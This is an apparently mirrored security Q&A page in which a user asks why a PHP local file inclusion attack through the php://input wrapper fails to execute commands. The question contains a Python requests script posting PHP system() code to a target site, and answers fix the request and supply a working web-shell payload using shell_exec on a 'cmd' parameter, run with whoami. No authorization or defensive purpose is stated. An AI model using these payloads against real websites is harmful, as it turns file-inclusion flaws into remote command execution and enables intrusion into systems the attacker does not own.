TransWikia.com

LFI php://input returning initial argument?

Information Security Asked by RFIx on February 27, 2021

TLDR: Trying to execute commands on site thats got a LFI vuln.

So I am making my post request to my vulnerable site and

import requests
header = {
            'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language':'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection':'close'
}

command = "<? system("echo does this work");?>"
requests.post("https://www.vulnsite.com/pog=php://input", headers=header, data=command)

then if i look at the actual response it returns:
<? system("echo does this work");?>

why isn’t it returning "does this work"? how can I get it to execute actual commands? what am I doing wrong?

file uploadlfiremote code executionweb application

3 Answers

Not every LFI is automatically RCE - it depends on the specific target. Did you already verify that you got RCE (for example using Burp or so)?

If so, you may also need to invoke your code after inserting it. I would try calling the URL to the injected script via browser or code and look at the result of this request.

Answered by nomiko on February 27, 2021

There is a problem the way you crafted the request using php wrapper, it should be, requests.post("https://www.vulnsite.com**?pog=php:**//input", headers=header, data=command) Note that you are using POST request to send the data to the server, so you should have way access that data, the complete request should be like this,

command = <?php echo shell_exec($_GET['cmd']); ?>

requests.post("https://www.vulnsite.com?pog=php://input&cmd=whoami", headers=header, data=command)

Also, I would recommend you should intercept the request while sending using proxy tools like burp or of your choice.

Answered by ifexploit on February 27, 2021

Maybe the your syntax isn't correct inside the system function, and the error output isn't printed. Try your request in the web browser buy using the source mode view with CTR+U.

Inside the system function should be called like this:

<?php system("echo 'does this work'");?>

Answered by kikos897 on February 27, 2021

Add your own answers!

Ask a Question

Get help from others!

Recent Questions

Recent Answers

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP